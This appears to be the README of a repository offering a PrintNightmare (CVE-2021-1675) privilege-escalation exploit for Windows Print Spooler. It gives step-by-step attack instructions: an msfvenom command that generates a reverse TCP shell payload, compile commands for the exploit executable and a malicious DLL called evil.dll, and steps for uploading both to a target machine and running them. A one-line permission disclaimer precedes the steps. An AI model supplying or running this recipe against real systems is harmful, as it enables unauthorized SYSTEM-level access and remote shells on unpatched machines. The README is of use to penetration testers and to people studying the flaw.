src/nightmare.cpp: source code to exploit CVE-2021-1675 and gain system access
by installing a malicious dll
src/payload-dll.cpp: source code for dll with malicious shellcode in entry function
!!Only use against servers on which you have permission to test
CVE-2021-1675 is a vulnerability in the Print Spooler Service of Microsoft Windows which allows an attacker to bypass the SeLoadDriverPrivilege check. This can be leveraged to gain privilege escalation on the target machine by installing a malicious DLL which calls shellcode or uses the Window API to establish a reverse shell connection. Versions of Windows 10/8/Server 2008/Server 2012 before June 8th, 2021 are affected.
- Download or clone git repo
- Use msfvenom to generate a suitable payload in c
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
- Paste the output of msfvenom into payload-dll.cpp where it says to 'change me'
- Compile the main executable
x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
- Compile the dll
x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
- Archive the exe and dll, then find a way to upload the archive to your target machine
zip ./bin/PrinterNightmareLPE.exe ./lib/
- Once the archive is on the target Windows machine, extract it
- Move evil.dll to c:\windows\temp\evil.dll
- Run the PrintNightmareLPE.exe
- If everything is working properly the exploit should iterate through the Windows' printer drivers and print out the results
- You can change the filepath PrintNightmareLPE.exe loads the evil.dll from inside the source code
- currently the malicous dll just loads calc.exe as Proof-of-Concept